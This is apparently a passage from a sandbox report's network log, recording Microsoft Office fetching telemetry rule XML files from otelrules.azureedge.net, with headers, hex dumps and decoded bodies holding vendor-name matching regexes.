                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095415Z-185f5d8b95c96jn4hC1NYCbgp80000000a3g0000000050zv
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      15192.168.2.64972313.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                      x-ms-request-id: bdf962e5-c01e-0066-1b8c-3aa1ec000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095415Z-185f5d8b95c4vwv8hC1NYCy4v40000000a8g000000003egf
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      16192.168.2.64972213.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:15 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                      x-ms-request-id: eb1ded04-b01e-0097-298c-3a4f33000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095415Z-185f5d8b95c9mqtvhC1NYCghtc0000000a70000000001keb
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      17192.168.2.64972613.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 7511ce5b-801e-0083-468c-3af0ae000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095416Z-r1d97b99577kk29chC1TEBemmg00000008n000000000g053
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      18192.168.2.64972813.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 76a157b4-e01e-00aa-258c-3aceda000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095416Z-r1d97b99577jlrkbhC1TEBq8d000000008f000000000egf7
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      19192.168.2.64972913.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 302bdaed-601e-003e-338c-3a3248000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095416Z-185f5d8b95c68cvnhC1NYCfn7s00000009yg00000000fcp6
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      20192.168.2.64973013.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                                                      x-ms-request-id: a1cde93a-f01e-0020-638c-3a956b000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095416Z-1777c6cb754ww792hC1TEBzqu4000000099g000000005u43
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      21192.168.2.64972713.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                                                      x-ms-request-id: b82db7f7-b01e-0053-188c-3acdf8000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095416Z-r1d97b99577sdxndhC1TEBec5n00000008qg00000000ee1f
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:16 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      22192.168.2.64973113.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                                                      x-ms-request-id: 0f1ce2f4-701e-0001-5e8c-3ab110000000
                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                      x-azure-ref: 20241120T095417Z-185f5d8b95cp7lkfhC1NYC7rpw0000000a2g00000000hky7
                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                      23192.168.2.64973513.107.246.45443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                      2024-11-20 09:54:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:54:17 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                      Content-Length: 428
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
